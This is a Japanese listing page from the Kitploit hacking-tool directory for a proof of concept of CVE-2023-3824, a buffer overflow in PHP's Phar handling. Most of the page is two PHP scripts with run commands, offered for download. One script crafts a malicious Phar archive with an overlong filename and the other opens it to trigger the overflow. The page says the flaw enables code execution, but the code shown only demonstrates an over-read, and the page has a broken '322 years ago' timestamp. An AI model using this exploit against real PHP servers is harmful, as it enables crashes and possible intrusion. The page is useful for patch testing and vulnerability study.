Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-3824 — PHP Pharファイルにおける脆弱性は、バッファオーバーフローによるもので、Pharアーカイブ内のファイル名に対する長さチェックが不十分であることに起因します。悪意のある攻撃者は、長いファイル名を持つPharファイルを作成することで、バッファオーバーフローを引き起こし、悪意のあるコードの実行やデータ漏洩につながる可能性があります。この脆弱性はコード実行のために悪用される可能性があります。CVE-2023-3824 | Kitploit
ツール/GitHubGitHub/jhonnybonny/cve-2023-3824
ペイロード生成脆弱性分析エクスプロイト学習と教育バイナリエクスプロイト
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

PHP Pharファイルにおける脆弱性は、バッファオーバーフローによるもので、Pharアーカイブ内のファイル名に対する長さチェックが不十分であることに起因します。悪意のある攻撃者は、長いファイル名を持つPharファイルを作成することで、バッファオーバーフローを引き起こし、悪意のあるコードの実行やデータ漏洩につながる可能性があります。この脆弱性はコード実行のために悪用される可能性があります。CVE-2023-3824

リポジトリを見る
322年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PHP 悪意のある Phar ファイル PoC (CVE-2023-3824)

説明

この Proof of Concept (PoC) は、PHP で悪意のある Phar ファイルを作成し、バッファオーバーフローの脆弱性を引き起こす方法を示しています。

使用方法

悪意のある Phar ファイルの作成

  1. 新しい PHP ファイル(例:create_phar.php)を作成し、次のコードを追加します:
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

PHP スクリプトを実行して悪意のある Phar ファイルを作成します: コードをコピー

root@kitploit:~
php create_phar.php

バッファオーバーフローのトリガー 別の PHP ファイル(例:trigger_overflow.php)を作成し、次のコードを追加します:

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

PHP スクリプトを実行してバッファオーバーフローをトリガーします: コードをコピー php trigger_overflow.php var_dump($x) ステートメントは、バッファオーバーフローと過剰読み取り操作の結果を出力します。

ツールをダウンロード